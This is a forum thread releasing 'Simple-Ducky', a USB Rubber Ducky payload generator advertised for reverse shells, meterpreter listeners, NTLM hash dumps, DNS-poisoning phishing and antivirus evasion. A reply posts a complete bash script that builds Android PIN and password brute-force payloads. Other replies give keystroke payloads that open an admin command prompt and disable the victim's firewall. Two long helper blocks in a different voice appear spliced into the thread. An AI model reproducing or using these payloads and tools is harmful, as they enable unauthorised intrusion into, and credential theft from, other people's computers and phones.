[Release] Simple-Ducky Payload Generator v1.1.1 (International Key Mapping|Kali Compatible|Custom Payload Builder)



Hello,
With usbrubberducky.com being down, I decided to create the Simple-Ducky Payload Generator. The simple-ducky is designed to quickly create reliable payloads and launch listeners. The Simple-Ducky currently uses version 2.6 of the duck encoder. The latest version of the Simple-Ducky supports all Debian Linux distros (e.g. Kali-Linux, Ubuntu, Linux Mint etc.). The smart installer will take care of all the work for you.
With the simple-ducky, in a matter of seconds you can:
* Create your evil executable (it's automatically placed in your web directory)
* Create your inject.bin
* Launch a listener (meterpreter or netcat)
* Generate custom password lists
* Crack extracted passwords
* And so much more...

Note: This framework was designed to work with Kali Linux out of the box (a JDK update is required and included with the simple-ducky). However, it should work with other Linux distros as long as you install the required dependencies (see the wiki page for non-Kali installs).

Installation

Installing the simple-ducky just got even easier. Just download the install script, then copy and paste the lines below into your terminal. The install script now supports all Debian based Linux distros.

Install videos are available on the Google code page: https://code.google.com/p/simple-ducky-payload-generator/

There are now two options to install the simple ducky....

Download the install file: https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=installer_v1.1.1_debian.sh&can=2&q=
root@kali:~# chmod +x installer_v1.1.1_debian.sh
root@kali:~# ./installer_v1.1.1_debian.sh
root@kali:~# rm installer_v1.1.1_debian.sh

To run the program: root@kali:~# simple-ducky

Change Log

v1.1.1 Changes
1. Added tons of new features: shells with dbd (incredibly powerful, see video below) and the Custom Payload Builder

2. Cleaned up menu options, dependencies, and processes

3. Made bug fixes to several payloads

4. Replaced Netcat with Ncat

v1.1.0 Changes
1. Upgraded the encoder to version 2.6

2. Made changes to the main menu

3. Added a new payload: LM/NTLM Hash Dump from a Live System

4. Added a new function: LM/NTLM Password Hasher

5. Added a new tool: Site2lst Custom Wordlist Builder

6. Upgraded the installer: Now there is just one version of the Simple-Ducky that supports all Debian distros (Tested on: Kali-Linux, Ubuntu and Linux Mint)

v1.0.9 Changes
1. Added a new payload subset titled "Forced Phishing & Web Attacks"

2. Integrated: SE-Toolkit, Metasploit's Browser_Autopwn, and BurpSuite.

3. Added Payload: Local DNS Poisoning | SE-Toolkit Java Applet Attack

4. Added Payload: Local DNS Poisoning | Metasploit's Browser_Autopwn

5. Added Payload: Proxy in the Middle (PiTM) | No Admin Access Needed | Burpsuite

v1.0.8 Changes
1. Added OSX Single User Mode Reverse Shell Payload

2. Made minor scripting changes

3. Changed Encoder to version 2.5

4. Fixed bugs in the FTP Server Setup option

5. Created a User add function for the FTP Server Setup Option

v1.0.7 Changes

1. Fixed command line entrance method on all Windows Vista/7 Payloads w/o UAC (Props to arzen)

v1.0.6 Changes

1. Created two separate versions of the simple-ducky (One for Kali-Linux and the other for Other Linux Distros)
* The purpose of the Kali-Edition is to follow the Debian compliance that Offensive-Security established, in hopes of getting the Simple-Ducky prepackaged in Kali-Linux. (Fingers crossed)
2. Removed the install dependencies option on the Kali-Linux version (Kali will keep these up to date)(Other-Linux version still has it)

3. Updated the Powershell Download & Execute Payloads to provide better obfuscation (tested on fully patched windows Vista/7/8 running McAfee)

4. Added a new function that configures the Pure-FTPD server for the user

v1.0.5 Changes
1. Complete Payload and Menu Revamp
v1.0.4 Changes
1. Added ~Persistence~ Payload
2. Updated Menu Options
v1.0.3 Changes
1. Payload Update
2. Added 64bit JDK Update Support
3. Added initial delay function (allows you to set a custom delay for driver install time).
4. Changed encoder version from 2.4 to 3.0
v1.0.2 Changes
1. International keyboard mapping added. -- Testers would be greatly appreciated.
2. Aesthetic changes to text.
v1.0.1 Changes
1. Payload Update
2. Encoder downgraded from v3.0 to v2.4 due to issues encoding the Win 7 Reverse Shell payload.

Custom Payload Builder and DBD... Watch as we get NT\SYSTEM level privs while evading AV!

Thanks for checking out the Simple-Ducky. Please provide any feedback and bug fixes to skyploit@gmail.com

~skysploit

Edited by skysploit


Hi, would this work with international keyboards?

Version 1.0.2 now supports international keyboards. Please download it and try it out as I have not been able to test the payloads using international key mappings. Let me know if you have any issues getting it to run.

Edited by skysploit


Awesome work! I started a project exactly like this a couple months ago but work struck and I haven't had time to maintain it. Below is the code for the pseudo framework shell script I wrote. Maybe you can digest it into your setup to add graphical menus with the dialog commands I used. You could also use zenity.

#!/bin/bash
#
# Payload-Generator version 1.0
# This tool is licensed under the GPLv3. Currently maintained by
# James Luther (CaptainHooligan)
#
# This tool is used to generate payloads for the USB Rubber Ducky
#
# Requires: bash 4 (zero-padded {0000..9999}), GNU sed (the first~step
# address form), dialog, java, duckencode.jar, wget and bzip2.
#
# ========================================================================
# Shared helpers
# ========================================================================

# dialog writes the selected tag to stderr, so stderr is redirected to a file.
# mktemp gives an unpredictable name; the fixed /tmp/menuitem.$$ used before
# could be pre-created or symlinked by another local user, and this script
# writes to it as root.
MENUFILE=$(mktemp) || exit 1
trap 'rm -f "$MENUFILE"' EXIT

# Full path to duckencode.jar, set by pre() and remembered between runs.
# "java -jar" needs the path itself; appending the jar's directory to PATH,
# as the previous version did, does not help.
DUCKENCODE=${DUCKENCODE:-}
WORDLIST=${WORDLIST:-rockyou.txt}

# Show a dialog menu; print the chosen tag, or nothing on Cancel/ESC.
menu ()
{
local title=$1; shift
dialog --backtitle "Ducky Payload Generator" --title "$title" \
       --menu "Make a selection using [UP], [DOWN], and use [ENTER] to select." 15 45 4 "$@" 2>"$MENUFILE"
local rc=$?     # capture dialog's exit status before another command overwrites $?
[ "$rc" -eq 0 ] && cat "$MENUFILE"
}

# Encode a Ducky Script and rename the resulting inject.bin.
encode ()
{
local script=$1 out=$2
java -jar "$DUCKENCODE" -i "$script" && mv inject.bin "$out" && ls -lart "${out%.bin}".*
}

# After every guess: wait one second and press ENTER twice.
# (GNU sed: the address 0~1 matches every line.)
guess_lines ()
{
sed '0~1 s/$/\nDELAY 1000\nENTER\nENTER/'
}

# Lock-screen variant: Android blocks input for 30 seconds after five wrong
# attempts, so after every fifth guess the script spends 20 seconds pressing
# ENTER to dismiss the lockout dialog before continuing.
lock_wait ()
{
sed '0~5 s/$/\nWAIT/' | guess_lines |
sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER\nDELAY 5000\nENTER/'
}

# All four-digit PINs as STRING lines (bash zero-pads the brace range).
pin_strings ()
{
printf 'STRING %s\n' {0000..9999}
}

# First 5000 rockyou entries as STRING lines.
password_strings ()
{
head -5000 "$WORDLIST" | sed 's/^/STRING /'
}

# Write a complete payload (5 s initial delay for driver install, then the
# guesses) to <base>.txt and encode it to <base>.bin.
# The old version wrote the initial DELAY to a scratch file it then deleted,
# so the encoded payload never had it.
#   $1 = base filename, $2 = line generator, $3 = wrapper (guess_lines|lock_wait)
build ()
{
local base=$1 gen=$2 wrap=$3
{ echo "DELAY 5000"; "$gen" | "$wrap"; } > "$base.txt"
encode "$base.txt" "$base.bin"
}

# ========================================================================
# Main Menu
# ========================================================================
main ()
{
case $(menu "Main Menu" Password "Brute Force Password" Pin "Brute Force Pin" About "Display About" Exit "Quit ") in
Pin) Pin;;
Password) Password;;
About) dialog --backtitle "Ducky Payload Generator" --title "About" --msgbox "\nThe Ducky Payload Generator is used to generate a number of payloads for the USB Rubber Ducky. As of right now it is just made to brute force Android passwords. Later pin brute forcing, reverse shell payloads, and whatever else we can think of will be added. Until then enjoy!\n\n Version: 1.0\n Licensed Under GPLv3\n Maintained by CaptainHooligan" 15 70 && clear && main;;
Exit) clear;;
*) clear;;
esac
}
# ==========================================================================
# This is where the Pin Brute Forcer is Generated
# ==========================================================================
Pin ()
{
case $(menu "Pin Brute Forcer" Encryption "Pin at Encryption Screen" Lock "Pin at Locked Screen" Main "Return to Main Menu") in
Encryption) clear && echo "Generating Encryption Screen Pin Brute Forcer Payload ..." && build android_brute-force_encryption pin_strings guess_lines;;
Lock) clear && echo "Generating Lock Screen Pin Brute Forcer Payload ... " && build android_brute-force_lock pin_strings lock_wait;;
Main) clear && main;;
*) clear ;;
esac
}
# =========================================================================
# This is where the Password Brute Forcer Menu is processed.
# =========================================================================
Password ()
{
case $(menu "Password Brute Forcer" Encryption "Password at Encryption Screen" Lock "Password at Locked Screen" Main "Return to Main Menu") in
Encryption) clear && Pword_Enc ;;
Lock) clear && Pword_Lck ;;
Main) clear && main ;;
*) clear ;;
esac
}
# ==========================================================================
# Password Encryption Screen Brute Forcer
# ==========================================================================
Pword_Enc ()
{
echo "Generating Encryption Screen Password Brute Forcer ..."
echo " "
build android-pword-encryption password_strings guess_lines
}
# ==========================================================================
# Password Lock Screen Brute Forcer
# ==========================================================================
Pword_Lck ()
{
echo "Generating Lock Screen Password Brute Forcer ..."
echo " "
build android-pword-lock password_strings lock_wait
}
# =====================================================================
# Prerequisite Checker
# =====================================================================
pre ()
{
echo "Verifying prerequisites are installed ... "
echo ""
# Locate the encoder jar once and keep its full path (-quit stops at the first hit).
DUCKENCODE=$(find / -name duckencode.jar -print -quit 2>/dev/null)
if [ -z "$DUCKENCODE" ] ; then
        echo "duckencode.jar not found on system. Please verify you have this installed."
        exit 1
fi
echo "duckencode.jar prerequisite met: $DUCKENCODE"
# command -v checks PATH; "find / -name wget" also matched directories and
# non-executables, and appending a file path to PATH did nothing useful.
for tool in java dialog bzip2 wget; do
        if ! command -v "$tool" >/dev/null 2>&1 ; then
                echo "$tool not found on system. Please verify you have this installed."
                exit 1
        fi
        echo "$tool prerequisite met."
done
echo ""
echo ""
echo "Verify connection to internet and press [Enter]."
read -r dummy
echo ""
echo ""
echo "Downloading rockyou password list. This can take some time ..."
echo ""
echo ""
# Fetched over plain HTTP with no published checksum, so compare the result
# with a copy from a source you trust before relying on it.
wget -O rockyou.txt.bz2 http://downloads.skullsecurity.org/passwords/rockyou.txt.bz2 || exit 1
bunzip2 -f rockyou.txt.bz2
echo ""
# Remember the encoder path so later runs can skip this step.
printf '%s\n' "$DUCKENCODE" > "$HOME/.payloadgenerator"
echo "All Prerequisites met. To continue press [Enter]."
read -r dummy
main
}
# ==========================================================================
# Actual program running
# ==========================================================================
clear
echo " "
if [ "$(id -u)" -ne 0 ] ; then
        echo "Sorry, you need super user access to run this script."
        exit 1
fi
echo " "
echo "Checking to see if you've met prerequisites before ..."
echo " "
# The old version tested /root/.payloadgenerator but read $HOME/.payloadgenerator;
# use $HOME for both. The file holds the encoder path found by pre().
if [ -f "$HOME/.payloadgenerator" ] ; then
        read -r DUCKENCODE < "$HOME/.payloadgenerator"
fi
if [ -n "$DUCKENCODE" ] && [ -f "$DUCKENCODE" ] ; then
        main
else
        pre
fi
Edited by CaptainHooligan

Hak5 crew,

Thanks so much for the shout-out on the show yesterday. The download count for the simple-ducky has gone up drastically in the last 24 hours... I put a new tool request on bugs.kali.org. Let's see if we can get it voted up and make a permanent mark for Hak5 in Kali. I have already built a new version (not posted) that places the ducky folder in the /usr/share directory and creates a symlink so that all you have to run is "simple-ducky" to start the payload generator.

CaptainHooligan,

Nice man... I will go through to see what I can add from your script in the next version of the simple-ducky.


ASCII artist wanted! I'm looking to class up the main menu a little bit. I know there are some talented artists among the Hak5 community. The art should be in bash format, include the title "Simple-Ducky Payload Generator" and include a duck of some sort. Send your art to skysploit@gmail.com


demonjester, I just ran it and can confirm that there are no issues with the payload... Try rebooting the victim machine. The only issue that I can see is that the script is running too fast for the victim machine. You can modify the delays in the conf file by opening /ducky/encoder/payloads/persistenceVIS7nouac.conf with any text editor. Currently this is how all of the Vista/7 without UAC payloads open a command prompt. If the consensus is that there need to be longer delays, I will modify all the confs in the next build, which will be available soon.

~skysploit

ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 800
ENTER

I'm having the same problem as demonjester. Rebooting and increasing the delays does not help. By the way, I'm testing this on a virtual machine running Win7 and Simple-Ducky v1.0.6.

-*azren*-

Edited by azren

Hmmm, sorry to hear that you are having issues. We are going to figure this out.... I assume by the screenshot that you are running US key mapping? Are you getting the same results with other payloads? How long of an entry delay are you using?

Edited by skysploit

Yes, I'm running US key mapping, and the other payloads I tested (listed below) also have the same issue.

  • 2. Persistence Reverse Shell w/o UAC (Win Vista/7)
  • 7. Windows Reverse Shell w/o UAC (No Download|Win Vista/7)
  • 12. Powershell Download & Execute w/o UAC (Admin Priv Shell|Win Vista/7)

Anyway, adding DELAY 400 after "STRING a" and "ENTER" solved this issue.

ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 400
ENTER
DELAY 400
STRING netsh firewall set opmode disable
Thanks for your help.
-*azren*-

azren,

Thanks for the feedback. I posted an updated version on the Google code page. If you already have v1.0.6 installed you can just download v1.0.7 and either replace the ducky directory (/usr/share/ducky) with the new one, or run the install.sh script again. It will probably give you an error about the symbolic link; that's OK, as it's just letting you know that the symbolic link already exists.

~skysploit

Edited by skysploit

When I tried to set a password that started with a capital letter, I think it just pressed enter without letting me actually type my full password. Actually, I think it just automatically goes, even without me typing anything. Here's the output:

Please set a password for DrDinosaur

/usr/bin/simple-ducky: line 2357: pure-pw: command not found
/usr/bin/simple-ducky: line 2358: pure-pw: command not found
/usr/bin/simple-ducky: line 2359: cd: /etc/pure-ftpd/auth/: No such file or directory
Creating you home directory, it will reside at /ftphome/

Starting the FTP server. To test your new account, in a new terminal type: ftp 127.0.0.1

/usr/bin/simple-ducky: line 2369: /etc/init.d/pure-ftpd: No such file or directory

I tried to set it up again, but it says the username already exists.

Edited by DrDinosaur

Are you able to log in to your server? You can remove the group, account, and all the other configuration settings by running the following...

root@kali:~# pure-pw userdel <username>
root@kali:~# userdel ftpuser
root@kali:~# groupdel ftpgroup
root@kali:~# rm /etc/pure-ftpd/auth/60pdb
root@kali:~# rmdir /ftphome/

Try running it again... Typically for my attacking machine's FTP server I use the creds:

username: hacker
password: hacker

The reason for this is that the commands are going to be run on the victim's machine, so you don't want your everyday account to get compromised or your real name exposed... On another note, I just went back through and set mine up using a 12 character password with uppercase, lowercase, special characters and numbers.

I have added this fix to the wiki page: https://code.google.com/p/simple-ducky-payload-generator/w/list

Hope this helps,

~skysploit

Edited by skysploit


I get the following error on all payloads that I try to generate on Kali 1.0.3 VM (I have already updated 64 bit java)


Exception in thread "main" java.lang.UnsupportedClassVersionError: Encoder : Unsupported major.minor version 51.0
at java.lang.ClassLoader.defineClass1(Native Method)
at java.lang.ClassLoader.defineClass(ClassLoader.java:634)
at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
at java.net.URLClassLoader.defineClass(URLClassLoader.java:277)
at java.net.URLClassLoader.access$000(URLClassLoader.java:73)
at java.net.URLClassLoader$1.run(URLClassLoader.java:212)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:205)
at java.lang.ClassLoader.loadClass(ClassLoader.java:321)
at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:294)
at java.lang.ClassLoader.loadClass(ClassLoader.java:266)
Could not find the main class: Encoder. Program will exit.



The end result is that no inject.bin file is ever created. The payload.txt file is created, but I cannot manually use the encoder from the terminal to convert it to inject.bin either. Kali Linux has the PAE kernel and should be considered 64 bit, right? When I updated Java should I have selected 32 bit? Could that be the cause of my grief?

UPDATE: Just tried this all out in BT5r3 with the other Linux installer and I am getting the exact same error. I know it is 32 bit and I used the 32 bit Java update option. I am not even getting the payload.txt generated in the ducky folder in BT5r3. Also, when installing dependencies it downloaded the latest 64 bit Metasploit installer, but MSF is already installed and fully updated. Should I bother running this installer? I fear it will bork up my MSF install. Thanks to all who respond! :)

Edited by TeCHemically

OK, it seems that this issue is caused by the Java environment variable pointing to the wrong version. How can I change this variable to point to the 1.7.0 Java version that simple ducky installs?

List available java implementations

$ update-java-alternatives --list

Use openjdk-6

$ update-java-alternatives --set java-6-openjdk

Use the non-free sun java.

$ update-java-alternatives --set java-6-sun

Use the non-free sun java only for the web plugin

$ update-java-alternatives --plugin --set java-6-sun
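The error quoted above is a class-file version mismatch: "major.minor version 51.0" means the Encoder class was compiled for Java 7 (class-file major 51), while the java binary the alternatives system currently selects is older. Before switching alternatives it helps to confirm that reading directly from the jar. The helpers below are an added example for this thread, not Simple-Ducky code: they read the major version from the class-file header, map it to a Java release, parse the installed JVM's version, and compare the two. They assume the encoder's main class is stored as Encoder.class at the root of duckencode.jar (the error names the class Encoder; the entry path is an assumption) and that `unzip` and `od` are available.

```shell
#!/bin/sh
# Added example; not part of Simple-Ducky. Function names are our own.

# Major version of a .class file (bytes 6-7, big endian, after the 0xCAFEBABE
# magic and the two minor-version bytes). Reads the file in $1, or stdin if no
# argument is given. Prints nothing and returns 1 if the header is not a class file.
class_major() {
    hex=$(od -An -tx1 -N8 "$@" | tr -d ' \n')
    [ ${#hex} -eq 16 ] && [ "${hex%????????}" = "cafebabe" ] || return 1
    printf '%d\n' "0x${hex#????????????}"
}

# Class-file major -> Java release that introduced it (45=1.1 ... 50=6, 51=7,
# 52=8; from 53 on the release number is major - 44).
java_release_for_major() {
    case $1 in
        45) echo "1.1" ;;
        46) echo "1.2" ;;
        47) echo "1.3" ;;
        48) echo "1.4" ;;
        49) echo "5" ;;
        50) echo "6" ;;
        51) echo "7" ;;
        52) echo "8" ;;
        *) [ "$1" -ge 53 ] && echo $(( $1 - 44 )) || return 1 ;;
    esac
}

# Java version string -> highest class-file major that JVM loads
# ("1.7.0_25" -> 51, "1.6.0_27" -> 50, "11.0.2" -> 55).
major_for_java_version() {
    rel=${1#1.}          # drop the legacy "1." prefix of 1.x releases
    rel=${rel%%[._]*}    # keep the leading number: 7, 8, 11 ...
    echo $(( rel + 44 ))
}

# Major version of one class inside a jar; unzip -p streams the entry to stdout.
# $1 = jar path, $2 = entry, e.g. Encoder.class (assumed location)
jar_class_major() {
    unzip -p "$1" "$2" | class_major
}

# Class-file major supported by the java currently on PATH. "java -version"
# reports on stderr, e.g. 'java version "1.7.0_25"' or 'openjdk version "11.0.2"'.
jvm_major_supported() {
    v=$(java -version 2>&1 | sed -n 's/^[a-z]* version "\([^"]*\)".*/\1/p' | head -n 1)
    [ -n "$v" ] || return 1
    major_for_java_version "$v"
}

# Compare a jar's class against the current JVM. Returns 0 when loadable,
# 1 on the mismatch seen in this thread, 2 if either side cannot be read.
check_jar_against_jvm() {
    need=$(jar_class_major "$1" "$2") || { echo "$2 in $1 is not a class file" >&2; return 2; }
    have=$(jvm_major_supported)       || { echo "no usable java on PATH" >&2; return 2; }
    if [ "$need" -gt "$have" ]; then
        echo "$2 needs class version $need (Java $(java_release_for_major "$need")); the selected JVM only loads up to $have" >&2
        return 1
    fi
    echo "ok: $2 class version $need, JVM supports $have"
}
```

Usage: `check_jar_against_jvm /usr/share/ducky/encoder/duckencode.jar Encoder.class` (adjust the path to wherever your install keeps the jar). On the setup in the post above it reports that Encoder.class needs version 51 (Java 7) while the selected JVM loads up to 50, which is the case `update-java-alternatives --set` with a 1.7 entry from `--list` fixes.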

Hello guys,

I am new to the rubber-ducky community and doing my first steps with the quack.

So at first, my environment:

root@kali:~# cat kali
PRETTY_NAME="Kali GNU/Linux 1.0"
NAME="Kali GNU/Linux"
ID=kali
VERSION="1.0"
VERSION_ID="1.0"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"
Distributor ID: Debian
Description: Debian GNU/Linux Kali Linux 1.0
Release: Kali Linux 1.0
Codename: n/a
Linux kali 3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali6 i686 GNU/Linux
Linux version 3.7-trunk-686-pae (debian-kernel@lists.debian.org) (gcc version 4.7.2 (Debian 4.7.2-5) ) #1 SMP Debian 3.7.2-0+kali6

I just updated the ducky to the firmware duck_v2.1.hex, which works fine.

OK, here we go with the issues:

I tried to do the firmware update with Windows 7 using the doc here:

http://code.google.com/p/ducky-decode/downloads/detail?name=The%20USB%20Rubber%20Ducky%20Draft.doc&can=2&q=

I tried to download the file http://code.google.com/p/ducky-decode/source/browse/trunk/Flash/Duck%20Programming.zip which should be around 20 megs; in fact it isn't, and I was unable to unpack it.

Therefore I switched to my Kali, which works fine for flashing.

By the way, why I am here right now is the following:

I downloaded the simple ducky payload script from here:

https://code.google.com/p/simple-ducky-payload-generator/downloads/detail?name=install_v1.0.9.sh&can=2&q=

chmod +x it and have this result, which looks fine to me:

-rwxr-xr-x 1 root root 700 May 2 09:34 install_v1.0.9.sh

Now, the problem: after running ./install_v1.0.9.sh the following message comes up:

bash: ./install_v1.0.9.sh: /bin/bash^M: bad interpreter: No such file or directory

So I tried with sh in front; my command looks like this: sh ./bash: ./install_v1.0.9.sh and the following errors are shown:

root@kali:~/work/rubberducky# sh ./install_v1.0.9.sh
-e \e[1;34mPlease wait while I download and install the Simple-Ducky Payload Generator\e[0m
--2013-05-02 10:04:15-- http://simple-ducky-payload-generator.googlecode.com/files/simple-ducky-v1.0.9-kali-edition.tar.gz%0D
Resolving simple-ducky-payload-generator.googlecode.com (simple-ducky-payload-generator.googlecode.com)... 173.194.70.82, 2a00:1450:4001:c02::52
Connecting to simple-ducky-payload-generator.googlecode.com (simple-ducky-payload-generator.googlecode.com)|173.194.70.82|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2013-05-02 10:04:15 ERROR 404: Not Found.

tar: /usr/share\r: Cannot open: No such file or directory
tar: Error is not recoverable: exiting now
ln: failed to create symbolic link `/usr/bin/simple-ducky\r': File exists
rm: cannot remove `simple-ducky-v1.0.9-kali-edition.tar.gz\r': No such file or directory
: not found1.0.9.sh: 7: ./install_v1.0.9.sh: clear
-e \e[1;34mDone! Be sure to setup your Pure-FTPD server (option 6) and update JDK to v1.7.0 (option 7) prior to generating any payloads.\e[0m

-e \e[1;34mType: simple-ducky in the terminal to launch...\e[0m

So that also looks very strange.

After that, I downloaded the file simple-ducky-v1.0.9-kali-edition.tar.gz

and placed it in the same directory as the install script and tried again, with no luck.

I have no idea what the problem is....

Regards
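Everything in the output above points at one cause: the installer was saved with Windows CRLF line endings. The kernel treats the trailing "\r" as part of the interpreter path in the shebang (hence "/bin/bash^M: bad interpreter"), and when the script is forced through sh every path and URL in it carries a stray "\r" too, which is the "%0D" on the wget URL, the "/usr/share\r" tar cannot open, and the "simple-ducky\r" symlink. Downloading the tarball by hand cannot fix that. The helpers below are an added example for this thread, not part of the Simple-Ducky installer or of anyone's post: they detect the CR bytes, make the shebang visible as it really is, strip the CRs, and refuse to execute a downloaded installer until it is clean. The function names are our own.

```shell
#!/bin/sh
# Added example; not part of the Simple-Ducky installer. Names are our own.

# Return 0 if the file contains any carriage return, 1 otherwise.
has_crlf() {
    cr=$(printf '\r')
    grep -q "$cr" "$1"
}

# Print the shebang line with control characters made visible, so a trailing
# "\r" shows up as the literal "^M" that the kernel complained about.
show_shebang() {
    head -n 1 "$1" | cat -v
}

# Strip every "\r" in place, keeping a backup of the original alongside.
fix_crlf() {
    cp "$1" "$1.crlf.bak"
    tr -d '\r' < "$1.crlf.bak" > "$1"
}

# Refuse to execute a downloaded installer while it still has CRLF endings;
# otherwise print its SHA-256 for the record and run it. Compare that digest
# with a value obtained out of band before trusting the script: the install
# steps at the top of this thread run it as root.
run_installer() {
    if has_crlf "$1"; then
        echo "refusing to run $1: CRLF line endings (shebang: $(show_shebang "$1"))" >&2
        return 2
    fi
    sha256sum "$1"
    sh "$1"
}
```

Usage: `run_installer install_v1.0.9.sh` refuses with the shebang shown as `#!/bin/bash^M`; `fix_crlf install_v1.0.9.sh` and a second `run_installer` then proceed. The same check is worth applying to any .sh fetched from a wiki or download page, since CRLF endings are what a browser or Windows editor often introduces silently.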

